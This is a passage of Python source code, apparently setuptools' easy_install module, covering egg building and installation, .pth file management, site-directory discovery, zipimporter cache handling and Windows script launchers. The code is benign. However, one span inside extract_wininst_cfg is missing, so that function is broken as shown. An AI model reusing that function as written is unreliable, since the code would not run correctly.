by being the application's script directory, by being on\nPYTHONPATH, or by being added to sys.path by your code.)\n\"\"\"\n eggloc = dist.location\n name = dist.project_name\n version = dist.version\n extras = '' # TODO: self.report_extras(req, dist)\n return msg % locals()\n\n def report_editable(self, spec, setup_script):\n dirname = os.path.dirname(setup_script)\n python = sys.executable\n return \"\"\"\\nExtracted editable version of %(spec)s to %(dirname)s\n\nIf it uses setuptools in its setup script, you can activate it in\n\"development\" mode by going to that directory and running::\n\n %(python)s setup.py develop\n\nSee the setuptools documentation for the \"develop\" command for more info.\n\"\"\" % locals()\n\n def run_setup(self, setup_script, setup_base, args):\n sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg)\n sys.modules.setdefault('distutils.command.egg_info', egg_info)\n\n args = list(args)\n if self.verbose > 2:\n v = 'v' * (self.verbose - 1)\n args.insert(0, '-' + v)\n elif self.verbose < 2:\n args.insert(0, '-q')\n if self.dry_run:\n args.insert(0, '-n')\n log.info(\n \"Running %s %s\", setup_script[len(setup_base) + 1:], ' '.join(args)\n )\n try:\n run_setup(setup_script, args)\n except SystemExit:\n v = sys.exc_info()[1]\n raise DistutilsError(\"Setup script exited with %s\" % (v.args[0],))\n\n def build_and_install(self, setup_script, setup_base):\n args = ['bdist_egg', '--dist-dir']\n\n dist_dir = tempfile.mkdtemp(\n prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script)\n )\n try:\n self._set_fetcher_options(os.path.dirname(setup_script))\n args.append(dist_dir)\n\n self.run_setup(setup_script, setup_base, args)\n all_eggs = Environment([dist_dir])\n eggs = []\n for key in all_eggs:\n for dist in all_eggs[key]:\n eggs.append(self.install_egg(dist.location, setup_base))\n if not eggs and not self.dry_run:\n log.warn(\"No eggs found in %s (setup script problem?)\",\n dist_dir)\n return eggs\n finally:\n rmtree(dist_dir)\n log.set_verbosity(self.verbose) # restore our log verbosity\n\n def _set_fetcher_options(self, base):\n \"\"\"\n When easy_install is about to run bdist_egg on a source dist, that\n source dist might have 'setup_requires' directives, requiring\n additional fetching. 
Ensure the fetcher options given to easy_install\n are available to that command as well.\n \"\"\"\n # find the fetch options from easy_install and write them out\n # to the setup.cfg file.\n ei_opts = self.distribution.get_option_dict('easy_install').copy()\n fetch_directives = (\n 'find_links', 'site_dirs', 'index_url', 'optimize',\n 'site_dirs', 'allow_hosts',\n )\n fetch_options = {}\n for key, val in ei_opts.items():\n if key not in fetch_directives:\n continue\n fetch_options[key.replace('_', '-')] = val[1]\n # create a settings dictionary suitable for `edit_config`\n settings = dict(easy_install=fetch_options)\n cfg_filename = os.path.join(base, 'setup.cfg')\n setopt.edit_config(cfg_filename, settings)\n\n def update_pth(self, dist):\n if self.pth_file is None:\n return\n\n for d in self.pth_file[dist.key]: # drop old entries\n if self.multi_version or d.location != dist.location:\n log.info(\"Removing %s from easy-install.pth file\", d)\n self.pth_file.remove(d)\n if d.location in self.shadow_path:\n self.shadow_path.remove(d.location)\n\n if not self.multi_version:\n if dist.location in self.pth_file.paths:\n log.info(\n \"%s is already the active version in easy-install.pth\",\n dist\n )\n else:\n log.info(\"Adding %s to easy-install.pth file\", dist)\n self.pth_file.add(dist) # add new entry\n if dist.location not in self.shadow_path:\n self.shadow_path.append(dist.location)\n\n if not self.dry_run:\n\n self.pth_file.save()\n\n if dist.key == 'setuptools':\n # Ensure that setuptools itself never becomes unavailable!\n # XXX should this check for latest version?\n filename = os.path.join(self.install_dir, 'setuptools.pth')\n if os.path.islink(filename):\n os.unlink(filename)\n f = open(filename, 'wt')\n f.write(self.pth_file.make_relative(dist.location) + '\\n')\n f.close()\n\n def unpack_progress(self, src, dst):\n # Progress filter for unpacking\n log.debug(\"Unpacking %s to %s\", src, dst)\n return dst # only unpack-and-compile skips files for dry run\n\n def unpack_and_compile(self, egg_path, destination):\n to_compile = []\n to_chmod = []\n\n def pf(src, dst):\n if dst.endswith('.py') and not src.startswith('EGG-INFO/'):\n to_compile.append(dst)\n elif dst.endswith('.dll') or dst.endswith('.so'):\n to_chmod.append(dst)\n self.unpack_progress(src, dst)\n return not self.dry_run and dst or None\n\n unpack_archive(egg_path, destination, pf)\n self.byte_compile(to_compile)\n if not self.dry_run:\n for f in to_chmod:\n mode = ((os.stat(f)[stat.ST_MODE]) | 0o555) & 0o7755\n chmod(f, mode)\n\n def byte_compile(self, to_compile):\n if sys.dont_write_bytecode:\n self.warn('byte-compiling is disabled, skipping.')\n return\n\n from distutils.util import byte_compile\n\n try:\n # try to make the byte compile messages quieter\n log.set_verbosity(self.verbose - 1)\n\n byte_compile(to_compile, optimize=0, force=1, dry_run=self.dry_run)\n if self.optimize:\n byte_compile(\n to_compile, optimize=self.optimize, force=1,\n dry_run=self.dry_run\n )\n finally:\n log.set_verbosity(self.verbose) # restore original verbosity\n\n def no_default_version_msg(self):\n template = \"\"\"bad install directory or PYTHONPATH\n\nYou are attempting to install a package to a directory that is not\non PYTHONPATH and which Python does not read \".pth\" files from. 
The\ninstallation directory you specified (via --install-dir, --prefix, or\nthe distutils default setting) was:\n\n %s\n\nand your PYTHONPATH environment variable currently contains:\n\n %r\n\nHere are some of your options for correcting the problem:\n\n* You can choose a different installation directory, i.e., one that is\n on PYTHONPATH or supports .pth files\n\n* You can add the installation directory to the PYTHONPATH environment\n variable. (It must then also be on PYTHONPATH whenever you run\n Python and want to use the package(s) you are installing.)\n\n* You can set up the installation directory to support \".pth\" files by\n using one of the approaches described here:\n\n https://pythonhosted.org/setuptools/easy_install.html#custom-installation-locations\n\nPlease make the appropriate changes for your system and try again.\"\"\"\n return template % (self.install_dir, os.environ.get('PYTHONPATH', ''))\n\n def install_site_py(self):\n \"\"\"Make sure there's a site.py in the target dir, if needed\"\"\"\n\n if self.sitepy_installed:\n return # already did it, or don't need to\n\n sitepy = os.path.join(self.install_dir, \"site.py\")\n source = resource_string(\"setuptools\", \"site-patch.py\")\n current = \"\"\n\n if os.path.exists(sitepy):\n log.debug(\"Checking existing site.py in %s\", self.install_dir)\n f = open(sitepy, 'rb')\n current = f.read()\n # we want str, not bytes\n if PY3:\n current = current.decode()\n\n f.close()\n if not current.startswith('def __boot():'):\n raise DistutilsError(\n \"%s is not a setuptools-generated site.py; please\"\n \" remove it.\" % sitepy\n )\n\n if current != source:\n log.info(\"Creating %s\", sitepy)\n if not self.dry_run:\n ensure_directory(sitepy)\n f = open(sitepy, 'wb')\n f.write(source)\n f.close()\n self.byte_compile([sitepy])\n\n self.sitepy_installed = True\n\n def create_home_path(self):\n \"\"\"Create directories under ~.\"\"\"\n if not self.user:\n return\n home = convert_path(os.path.expanduser(\"~\"))\n for name, path in iteritems(self.config_vars):\n if path.startswith(home) and not os.path.isdir(path):\n self.debug_print(\"os.makedirs('%s', 0o700)\" % path)\n os.makedirs(path, 0o700)\n\n INSTALL_SCHEMES = dict(\n posix=dict(\n install_dir='$base/lib/python$py_version_short/site-packages',\n script_dir='$base/bin',\n ),\n )\n\n DEFAULT_SCHEME = dict(\n install_dir='$base/Lib/site-packages',\n script_dir='$base/Scripts',\n )\n\n def _expand(self, *attrs):\n config_vars = self.get_finalized_command('install').config_vars\n\n if self.prefix:\n # Set default install_dir/scripts from --prefix\n config_vars = config_vars.copy()\n config_vars['base'] = self.prefix\n scheme = self.INSTALL_SCHEMES.get(os.name, self.DEFAULT_SCHEME)\n for attr, val in scheme.items():\n if getattr(self, attr, None) is None:\n setattr(self, attr, val)\n\n from distutils.util import subst_vars\n\n for attr in attrs:\n val = getattr(self, attr)\n if val is not None:\n val = subst_vars(val, config_vars)\n if os.name == 'posix':\n val = os.path.expanduser(val)\n setattr(self, attr, val)\n\n\ndef get_site_dirs():\n # return a list of 'site' dirs\n sitedirs = [_f for _f in os.environ.get('PYTHONPATH',\n '').split(os.pathsep) if _f]\n prefixes = [sys.prefix]\n if sys.exec_prefix != sys.prefix:\n prefixes.append(sys.exec_prefix)\n for prefix in prefixes:\n if prefix:\n if sys.platform in ('os2emx', 'riscos'):\n sitedirs.append(os.path.join(prefix, \"Lib\", \"site-packages\"))\n elif os.sep == '/':\n sitedirs.extend([os.path.join(prefix,\n \"lib\",\n \"python\" + 
sys.version[:3],\n \"site-packages\"),\n os.path.join(prefix, \"lib\", \"site-python\")])\n else:\n sitedirs.extend(\n [prefix, os.path.join(prefix, \"lib\", \"site-packages\")]\n )\n if sys.platform == 'darwin':\n # for framework builds *only* we add the standard Apple\n # locations. Currently only per-user, but /Library and\n # /Network/Library could be added too\n if 'Python.framework' in prefix:\n home = os.environ.get('HOME')\n if home:\n sitedirs.append(\n os.path.join(home,\n 'Library',\n 'Python',\n sys.version[:3],\n 'site-packages'))\n lib_paths = get_path('purelib'), get_path('platlib')\n for site_lib in lib_paths:\n if site_lib not in sitedirs:\n sitedirs.append(site_lib)\n\n if site.ENABLE_USER_SITE:\n sitedirs.append(site.USER_SITE)\n\n sitedirs = list(map(normalize_path, sitedirs))\n\n return sitedirs\n\n\ndef expand_paths(inputs):\n \"\"\"Yield sys.path directories that might contain \"old-style\" packages\"\"\"\n\n seen = {}\n\n for dirname in inputs:\n dirname = normalize_path(dirname)\n if dirname in seen:\n continue\n\n seen[dirname] = 1\n if not os.path.isdir(dirname):\n continue\n\n files = os.listdir(dirname)\n yield dirname, files\n\n for name in files:\n if not name.endswith('.pth'):\n # We only care about the .pth files\n continue\n if name in ('easy-install.pth', 'setuptools.pth'):\n # Ignore .pth files that we control\n continue\n\n # Read the .pth file\n f = open(os.path.join(dirname, name))\n lines = list(yield_lines(f))\n f.close()\n\n # Yield existing non-dupe, non-import directory lines from it\n for line in lines:\n if not line.startswith(\"import\"):\n line = normalize_path(line.rstrip())\n if line not in seen:\n seen[line] = 1\n if not os.path.isdir(line):\n continue\n yield line, os.listdir(line)\n\n\ndef extract_wininst_cfg(dist_filename):\n \"\"\"Extract configuration data from a bdist_wininst .exe\n\n Returns a ConfigParser.RawConfigParser, or None\n \"\"\"\n f = open(dist_filename, 'rb')\n try:\n endrec = zipfile._EndRecData(f)\n if endrec is None:\n return None\n\n prepended = (endrec[9] - endrec[5]) - endrec[6]\n if prepended < 12: # no wininst data here\n return None\n f.seek(prepended - 12)\n\n from setuptools.compat import StringIO, ConfigParser\n import struct\n\n tag, cfglen, bmlen = struct.unpack(\"= (2, 6):\n null_byte = bytes([0])\n else:\n null_byte = chr(0)\n config = part.split(null_byte, 1)[0]\n # Now the config is in bytes, but for RawConfigParser, it should\n # be text, so decode it.\n config = config.decode(sys.getfilesystemencoding())\n cfg.readfp(StringIO(config))\n except ConfigParser.Error:\n return None\n if not cfg.has_section('metadata') or not cfg.has_section('Setup'):\n return None\n return cfg\n\n finally:\n f.close()\n\n\ndef get_exe_prefixes(exe_filename):\n \"\"\"Get exe->egg path translations for a given .exe file\"\"\"\n\n prefixes = [\n ('PURELIB/', ''), ('PLATLIB/pywin32_system32', ''),\n ('PLATLIB/', ''),\n ('SCRIPTS/', 'EGG-INFO/scripts/'),\n ('DATA/lib/site-packages', ''),\n ]\n z = zipfile.ZipFile(exe_filename)\n try:\n for info in z.infolist():\n name = info.filename\n parts = name.split('/')\n if len(parts) == 3 and parts[2] == 'PKG-INFO':\n if parts[1].endswith('.egg-info'):\n prefixes.insert(0, ('/'.join(parts[:2]), 'EGG-INFO/'))\n break\n if len(parts) != 2 or not name.endswith('.pth'):\n continue\n if name.endswith('-nspkg.pth'):\n continue\n if parts[0].upper() in ('PURELIB', 'PLATLIB'):\n contents = z.read(name)\n if PY3:\n contents = contents.decode()\n for pth in yield_lines(contents):\n pth = 
pth.strip().replace('\\\\', '/')\n if not pth.startswith('import'):\n prefixes.append((('%s/%s/' % (parts[0], pth)), ''))\n finally:\n z.close()\n prefixes = [(x.lower(), y) for x, y in prefixes]\n prefixes.sort()\n prefixes.reverse()\n return prefixes\n\n\ndef parse_requirement_arg(spec):\n try:\n return Requirement.parse(spec)\n except ValueError:\n raise DistutilsError(\n \"Not a URL, existing file, or requirement spec: %r\" % (spec,)\n )\n\n\nclass PthDistributions(Environment):\n \"\"\"A .pth file with Distribution paths in it\"\"\"\n\n dirty = False\n\n def __init__(self, filename, sitedirs=()):\n self.filename = filename\n self.sitedirs = list(map(normalize_path, sitedirs))\n self.basedir = normalize_path(os.path.dirname(self.filename))\n self._load()\n Environment.__init__(self, [], None, None)\n for path in yield_lines(self.paths):\n list(map(self.add, find_distributions(path, True)))\n\n def _load(self):\n self.paths = []\n saw_import = False\n seen = dict.fromkeys(self.sitedirs)\n if os.path.isfile(self.filename):\n f = open(self.filename, 'rt')\n for line in f:\n if line.startswith('import'):\n saw_import = True\n continue\n path = line.rstrip()\n self.paths.append(path)\n if not path.strip() or path.strip().startswith('#'):\n continue\n # skip non-existent paths, in case somebody deleted a package\n # manually, and duplicate paths as well\n path = self.paths[-1] = normalize_path(\n os.path.join(self.basedir, path)\n )\n if not os.path.exists(path) or path in seen:\n self.paths.pop() # skip it\n self.dirty = True # we cleaned up, so we're dirty now :)\n continue\n seen[path] = 1\n f.close()\n\n if self.paths and not saw_import:\n self.dirty = True # ensure anything we touch has import wrappers\n while self.paths and not self.paths[-1].strip():\n self.paths.pop()\n\n def save(self):\n \"\"\"Write changed .pth file back to disk\"\"\"\n if not self.dirty:\n return\n\n data = '\\n'.join(map(self.make_relative, self.paths))\n if data:\n log.debug(\"Saving %s\", self.filename)\n data = (\n \"import sys; sys.__plen = len(sys.path)\\n\"\n \"%s\\n\"\n \"import sys; new=sys.path[sys.__plen:];\"\n \" del sys.path[sys.__plen:];\"\n \" p=getattr(sys,'__egginsert',0); sys.path[p:p]=new;\"\n \" sys.__egginsert = p+len(new)\\n\"\n ) % data\n\n if os.path.islink(self.filename):\n os.unlink(self.filename)\n f = open(self.filename, 'wt')\n f.write(data)\n f.close()\n\n elif os.path.exists(self.filename):\n log.debug(\"Deleting empty %s\", self.filename)\n os.unlink(self.filename)\n\n self.dirty = False\n\n def add(self, dist):\n \"\"\"Add `dist` to the distribution map\"\"\"\n new_path = (\n dist.location not in self.paths and (\n dist.location not in self.sitedirs or\n # account for '.' 
being in PYTHONPATH\n dist.location == os.getcwd()\n )\n )\n if new_path:\n self.paths.append(dist.location)\n self.dirty = True\n Environment.add(self, dist)\n\n def remove(self, dist):\n \"\"\"Remove `dist` from the distribution map\"\"\"\n while dist.location in self.paths:\n self.paths.remove(dist.location)\n self.dirty = True\n Environment.remove(self, dist)\n\n def make_relative(self, path):\n npath, last = os.path.split(normalize_path(path))\n baselen = len(self.basedir)\n parts = [last]\n sep = os.altsep == '/' and '/' or os.sep\n while len(npath) >= baselen:\n if npath == self.basedir:\n parts.append(os.curdir)\n parts.reverse()\n return sep.join(parts)\n npath, last = os.path.split(npath)\n parts.append(last)\n else:\n return path\n\n\ndef _first_line_re():\n \"\"\"\n Return a regular expression based on first_line_re suitable for matching\n strings.\n \"\"\"\n if isinstance(first_line_re.pattern, str):\n return first_line_re\n\n # first_line_re in Python >=3.1.4 and >=3.2.1 is a bytes pattern.\n return re.compile(first_line_re.pattern.decode())\n\n\ndef get_script_header(script_text, executable=sys_executable, wininst=False):\n \"\"\"Create a #! line, getting options (if any) from script_text\"\"\"\n first = (script_text + '\\n').splitlines()[0]\n match = _first_line_re().match(first)\n options = ''\n if match:\n options = match.group(1) or ''\n if options:\n options = ' ' + options\n if wininst:\n executable = \"python.exe\"\n else:\n executable = nt_quote_arg(executable)\n hdr = \"#!%(executable)s%(options)s\\n\" % locals()\n if not isascii(hdr):\n # Non-ascii path to sys.executable, use -x to prevent warnings\n if options:\n if options.strip().startswith('-'):\n options = ' -x' + options.strip()[1:]\n # else: punt, we can't do it, let the warning happen anyway\n else:\n options = ' -x'\n executable = fix_jython_executable(executable, options)\n hdr = \"#!%(executable)s%(options)s\\n\" % locals()\n return hdr\n\n\ndef auto_chmod(func, arg, exc):\n if func is os.remove and os.name == 'nt':\n chmod(arg, stat.S_IWRITE)\n return func(arg)\n et, ev, _ = sys.exc_info()\n reraise(et, (ev[0], ev[1] + (\" %s %s\" % (func, arg))))\n\n\ndef update_dist_caches(dist_path, fix_zipimporter_caches):\n \"\"\"\n Fix any globally cached `dist_path` related data\n\n `dist_path` should be a path of a newly installed egg distribution (zipped\n or unzipped).\n\n sys.path_importer_cache contains finder objects that have been cached when\n importing data from the original distribution. Any such finders need to be\n cleared since the replacement distribution might be packaged differently,\n e.g. a zipped egg distribution might get replaced with an unzipped egg\n folder or vice versa. Having the old finders cached may then cause Python\n to attempt loading modules from the replacement distribution using an\n incorrect loader.\n\n zipimport.zipimporter objects are Python loaders charged with importing\n data packaged inside zip archives. If stale loaders referencing the\n original distribution, are left behind, they can fail to load modules from\n the replacement distribution. E.g. if an old zipimport.zipimporter instance\n is used to load data from a new zipped egg archive, it may cause the\n operation to attempt to locate the requested data in the wrong location -\n one indicated by the original distribution's zip archive directory\n information. Such an operation may then fail outright, e.g. 
report having\n read a 'bad local file header', or even worse, it may fail silently &\n return invalid data.\n\n zipimport._zip_directory_cache contains cached zip archive directory\n information for all existing zipimport.zipimporter instances and all such\n instances connected to the same archive share the same cached directory\n information.\n\n If asked, and the underlying Python implementation allows it, we can fix\n all existing zipimport.zipimporter instances instead of having to track\n them down and remove them one by one, by updating their shared cached zip\n archive directory information. This, of course, assumes that the\n replacement distribution is packaged as a zipped egg.\n\n If not asked to fix existing zipimport.zipimporter instances, we still do\n our best to clear any remaining zipimport.zipimporter related cached data\n that might somehow later get used when attempting to load data from the new\n distribution and thus cause such load operations to fail. Note that when\n tracking down such remaining stale data, we can not catch every conceivable\n usage from here, and we clear only those that we know of and have found to\n cause problems if left alive. Any remaining caches should be updated by\n whomever is in charge of maintaining them, i.e. they should be ready to\n handle us replacing their zip archives with new distributions at runtime.\n\n \"\"\"\n # There are several other known sources of stale zipimport.zipimporter\n # instances that we do not clear here, but might if ever given a reason to\n # do so:\n # * Global setuptools pkg_resources.working_set (a.k.a. 'master working\n # set') may contain distributions which may in turn contain their\n # zipimport.zipimporter loaders.\n # * Several zipimport.zipimporter loaders held by local variables further\n # up the function call stack when running the setuptools installation.\n # * Already loaded modules may have their __loader__ attribute set to the\n # exact loader instance used when importing them. Python 3.4 docs state\n # that this information is intended mostly for introspection and so is\n # not expected to cause us problems.\n normalized_path = normalize_path(dist_path)\n _uncache(normalized_path, sys.path_importer_cache)\n if fix_zipimporter_caches:\n _replace_zip_directory_cache_data(normalized_path)\n else:\n # Here, even though we do not want to fix existing and now stale\n # zipimporter cache information, we still want to remove it. Related to\n # Python's zip archive directory information cache, we clear each of\n # its stale entries in two phases:\n # 1. Clear the entry so attempting to access zip archive information\n # via any existing stale zipimport.zipimporter instances fails.\n # 2. Remove the entry from the cache so any newly constructed\n # zipimport.zipimporter instances do not end up using old stale\n # zip archive directory information.\n # This whole stale data removal step does not seem strictly necessary,\n # but has been left in because it was done before we started replacing\n # the zip archive directory information cache content if possible, and\n # there are no relevant unit tests that we can depend on to tell us if\n # this is really needed.\n _remove_and_clear_zip_directory_cache_data(normalized_path)\n\n\ndef _collect_zipimporter_cache_entries(normalized_path, cache):\n \"\"\"\n Return zipimporter cache entry keys related to a given normalized path.\n\n Alternative path spellings (e.g. 
those using different character case or\n those using alternative path separators) related to the same path are\n included. Any sub-path entries are included as well, i.e. those\n corresponding to zip archives embedded in other zip archives.\n\n \"\"\"\n result = []\n prefix_len = len(normalized_path)\n for p in cache:\n np = normalize_path(p)\n if (np.startswith(normalized_path) and\n np[prefix_len:prefix_len + 1] in (os.sep, '')):\n result.append(p)\n return result\n\n\ndef _update_zipimporter_cache(normalized_path, cache, updater=None):\n \"\"\"\n Update zipimporter cache data for a given normalized path.\n\n Any sub-path entries are processed as well, i.e. those corresponding to zip\n archives embedded in other zip archives.\n\n Given updater is a callable taking a cache entry key and the original entry\n (after already removing the entry from the cache), and expected to update\n the entry and possibly return a new one to be inserted in its place.\n Returning None indicates that the entry should not be replaced with a new\n one. If no updater is given, the cache entries are simply removed without\n any additional processing, the same as if the updater simply returned None.\n\n \"\"\"\n for p in _collect_zipimporter_cache_entries(normalized_path, cache):\n # N.B. pypy's custom zipimport._zip_directory_cache implementation does\n # not support the complete dict interface:\n # * Does not support item assignment, thus not allowing this function\n # to be used only for removing existing cache entries.\n # * Does not support the dict.pop() method, forcing us to use the\n # get/del patterns instead. For more detailed information see the\n # following links:\n # https://bitbucket.org/pypa/setuptools/issue/202/more-robust-zipimporter-cache-invalidation#comment-10495960\n # https://bitbucket.org/pypy/pypy/src/dd07756a34a41f674c0cacfbc8ae1d4cc9ea2ae4/pypy/module/zipimport/interp_zipimport.py#cl-99\n old_entry = cache[p]\n del cache[p]\n new_entry = updater and updater(p, old_entry)\n if new_entry is not None:\n cache[p] = new_entry\n\n\ndef _uncache(normalized_path, cache):\n _update_zipimporter_cache(normalized_path, cache)\n\n\ndef _remove_and_clear_zip_directory_cache_data(normalized_path):\n def clear_and_remove_cached_zip_archive_directory_data(path, old_entry):\n old_entry.clear()\n\n _update_zipimporter_cache(\n normalized_path, zipimport._zip_directory_cache,\n updater=clear_and_remove_cached_zip_archive_directory_data)\n\n# PyPy Python implementation does not allow directly writing to the\n# zipimport._zip_directory_cache and so prevents us from attempting to correct\n# its content. The best we can do there is clear the problematic cache content\n# and have PyPy repopulate it as needed. The downside is that if there are any\n# stale zipimport.zipimporter instances laying around, attempting to use them\n# will fail due to not having its zip archive directory information available\n# instead of being automatically corrected to use the new correct zip archive\n# directory information.\nif '__pypy__' in sys.builtin_module_names:\n _replace_zip_directory_cache_data = \\\n _remove_and_clear_zip_directory_cache_data\nelse:\n def _replace_zip_directory_cache_data(normalized_path):\n def replace_cached_zip_archive_directory_data(path, old_entry):\n # N.B. 
In theory, we could load the zip directory information just\n # once for all updated path spellings, and then copy it locally and\n # update its contained path strings to contain the correct\n # spelling, but that seems like a way too invasive move (this cache\n # structure is not officially documented anywhere and could in\n # theory change with new Python releases) for no significant\n # benefit.\n old_entry.clear()\n zipimport.zipimporter(path)\n old_entry.update(zipimport._zip_directory_cache[path])\n return old_entry\n\n _update_zipimporter_cache(\n normalized_path, zipimport._zip_directory_cache,\n updater=replace_cached_zip_archive_directory_data)\n\n\ndef is_python(text, filename=''):\n \"Is this string a valid Python script?\"\n try:\n compile(text, filename, 'exec')\n except (SyntaxError, TypeError):\n return False\n else:\n return True\n\n\ndef is_sh(executable):\n \"\"\"Determine if the specified executable is a .sh (contains a #! line)\"\"\"\n try:\n fp = open(executable)\n magic = fp.read(2)\n fp.close()\n except (OSError, IOError):\n return executable\n return magic == '#!'\n\n\ndef nt_quote_arg(arg):\n \"\"\"Quote a command line argument according to Windows parsing rules\"\"\"\n\n result = []\n needquote = False\n nb = 0\n\n needquote = (\" \" in arg) or (\"\\t\" in arg)\n if needquote:\n result.append('\"')\n\n for c in arg:\n if c == '\\\\':\n nb += 1\n elif c == '\"':\n # double preceding backslashes, then add a \\\"\n result.append('\\\\' * (nb * 2) + '\\\\\"')\n nb = 0\n else:\n if nb:\n result.append('\\\\' * nb)\n nb = 0\n result.append(c)\n\n if nb:\n result.append('\\\\' * nb)\n\n if needquote:\n result.append('\\\\' * nb) # double the trailing backslashes\n result.append('\"')\n\n return ''.join(result)\n\n\ndef is_python_script(script_text, filename):\n \"\"\"Is this text, as a whole, a Python script? (as opposed to shell/bat/etc.\n \"\"\"\n if filename.endswith('.py') or filename.endswith('.pyw'):\n return True # extension says it's Python\n if is_python(script_text, filename):\n return True # it's syntactically valid Python\n if script_text.startswith('#!'):\n # It begins with a '#!' 
line, so check if 'python' is in it somewhere\n return 'python' in script_text.splitlines()[0].lower()\n\n return False # Not any Python I can recognize\n\n\ntry:\n from os import chmod as _chmod\nexcept ImportError:\n # Jython compatibility\n def _chmod(*args):\n pass\n\n\ndef chmod(path, mode):\n log.debug(\"changing mode of %s to %o\", path, mode)\n try:\n _chmod(path, mode)\n except os.error:\n e = sys.exc_info()[1]\n log.debug(\"chmod failed: %s\", e)\n\n\ndef fix_jython_executable(executable, options):\n if sys.platform.startswith('java') and is_sh(executable):\n # Workaround for Jython is not needed on Linux systems.\n import java\n\n if java.lang.System.getProperty(\"os.name\") == \"Linux\":\n return executable\n\n # Workaround Jython's sys.executable being a .sh (an invalid\n # shebang line interpreter)\n if options:\n # Can't apply the workaround, leave it broken\n log.warn(\n \"WARNING: Unable to adapt shebang line for Jython,\"\n \" the following script is NOT executable\\n\"\n \" see http://bugs.jython.org/issue1112 for\"\n \" more information.\")\n else:\n return '/usr/bin/env %s' % executable\n return executable\n\n\nclass ScriptWriter(object):\n \"\"\"\n Encapsulates behavior around writing entry point scripts for console and\n gui apps.\n \"\"\"\n\n template = textwrap.dedent(\"\"\"\n # EASY-INSTALL-ENTRY-SCRIPT: %(spec)r,%(group)r,%(name)r\n __requires__ = %(spec)r\n import sys\n from pkg_resources import load_entry_point\n\n if __name__ == '__main__':\n sys.exit(\n load_entry_point(%(spec)r, %(group)r, %(name)r)()\n )\n \"\"\").lstrip()\n\n @classmethod\n def get_script_args(cls, dist, executable=sys_executable, wininst=False):\n \"\"\"\n Yield write_script() argument tuples for a distribution's entrypoints\n \"\"\"\n gen_class = cls.get_writer(wininst)\n spec = str(dist.as_requirement())\n header = get_script_header(\"\", executable, wininst)\n for type_ in 'console', 'gui':\n group = type_ + '_scripts'\n for name, ep in dist.get_entry_map(group).items():\n script_text = gen_class.template % locals()\n for res in gen_class._get_script_args(type_, name, header,\n script_text):\n yield res\n\n @classmethod\n def get_writer(cls, force_windows):\n if force_windows or sys.platform == 'win32':\n return WindowsScriptWriter.get_writer()\n return cls\n\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n # Simply write the stub with no extension.\n yield (name, header + script_text)\n\n\nclass WindowsScriptWriter(ScriptWriter):\n @classmethod\n def get_writer(cls):\n \"\"\"\n Get a script writer suitable for Windows\n \"\"\"\n writer_lookup = dict(\n executable=WindowsExecutableLauncherWriter,\n natural=cls,\n )\n # for compatibility, use the executable launcher by default\n launcher = os.environ.get('SETUPTOOLS_LAUNCHER', 'executable')\n return writer_lookup[launcher]\n\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n \"For Windows, add a .py extension\"\n ext = dict(console='.pya', gui='.pyw')[type_]\n if ext not in os.environ['PATHEXT'].lower().split(';'):\n warnings.warn(\"%s not listed in PATHEXT; scripts will not be \"\n \"recognized as executables.\" % ext, UserWarning)\n old = ['.pya', '.py', '-script.py', '.pyc', '.pyo', '.pyw', '.exe']\n old.remove(ext)\n header = cls._adjust_header(type_, header)\n blockers = [name + x for x in old]\n yield name + ext, header + script_text, 't', blockers\n\n @staticmethod\n def _adjust_header(type_, orig_header):\n \"\"\"\n Make sure 'pythonw' is used for gui and and 'python' 
is used for\n console (regardless of what sys.executable is).\n \"\"\"\n pattern = 'pythonw.exe'\n repl = 'python.exe'\n if type_ == 'gui':\n pattern, repl = repl, pattern\n pattern_ob = re.compile(re.escape(pattern), re.IGNORECASE)\n new_header = pattern_ob.sub(string=orig_header, repl=repl)\n clean_header = new_header[2:-1].strip('\"')\n if sys.platform == 'win32' and not os.path.exists(clean_header):\n # the adjusted version doesn't exist, so return the original\n return orig_header\n return new_header\n\n\nclass WindowsExecutableLauncherWriter(WindowsScriptWriter):\n @classmethod\n def _get_script_args(cls, type_, name, header, script_text):\n \"\"\"\n For Windows, add a .py extension and an .exe launcher\n \"\"\"\n if type_ == 'gui':\n launcher_type = 'gui'\n ext = '-script.pyw'\n old = ['.pyw']\n else:\n launcher_type = 'cli'\n ext = '-script.py'\n old = ['.py', '.pyc', '.pyo']\n hdr = cls._adjust_header(type_, header)\n blockers = [name + x for x in old]\n yield (name + ext, hdr + script_text, 't', blockers)\n yield (\n name + '.exe', get_win_launcher(launcher_type),\n 'b' # write in binary mode\n )\n if not is_64bit():\n # install a manifest for the launcher to prevent Windows\n # from detecting it as an installer (which it will for\n # launchers like easy_install.exe). Consider only\n # adding a manifest for launchers detected as installers.\n # See Distribute #143 for details.\n m_name = name + '.exe.manifest'\n yield (m_name, load_launcher_manifest(name), 't')\n\n\n# for backward-compatibility\nget_script_args = ScriptWriter.get_script_args\n\n\ndef get_win_launcher(type):\n \"\"\"\n Load the Windows launcher (executable) suitable for launching a script.\n\n `type` should be either 'cli' or 'gui'\n\n Returns the executable as a byte string.\n \"\"\"\n launcher_fn = '%s.exe' % type\n if platform.machine().lower() == 'arm':\n launcher_fn = launcher_fn.replace(\".\", \"-arm.\")\n if is_64bit():\n launcher_fn = launcher_fn.replace(\".\", \"-64.\")\n else:\n launcher_fn = launcher_fn.replace(\".\", \"-32.\")\n return resource_string('setuptools', launcher_fn)\n\n\ndef load_launcher_manifest(name):\n manifest = pkg_resources.resource_string(__name__, 'launcher manifest.xml')\n if PY2:\n return manifest % vars()\n else:\n return manifest.decode('utf-8') % vars()\n\n\ndef rmtree(path, ignore_errors=False, onerror=auto_chmod):\n \"\"\"Recursively delete a directory tree.\n\n This code is taken from the Python 2.4 version of 'shutil', because\n the 2.3 version doesn't really work right.\n \"\"\"\n if ignore_errors:\n def onerror(*args):\n pass\n elif onerror is None:\n def onerror(*args):\n raise\n names = []\n try:\n names = os.listdir(path)\n except os.error:\n onerror(os.listdir, path, sys.exc_info())\n for name in names:\n fullname = os.path.join(path, name)\n try:\n mode = os.lstat(fullname).st_mode\n except os.error:\n mode = 0\n if stat.S_ISDIR(mode):\n rmtree(fullname, ignore_errors, onerror)\n else:\n try:\n os.remove(fullname)\n except os.error:\n onerror(os.remove, fullname, sys.exc_info())\n try:\n os.rmdir(path)\n except os.error:\n onerror(os.rmdir, path, sys.exc_info())\n\n\ndef current_umask():\n tmp = os.umask(0o022)\n os.umask(tmp)\n return tmp\n\n\ndef bootstrap():\n # This function is called when setuptools*.egg is run using /bin/sh\n 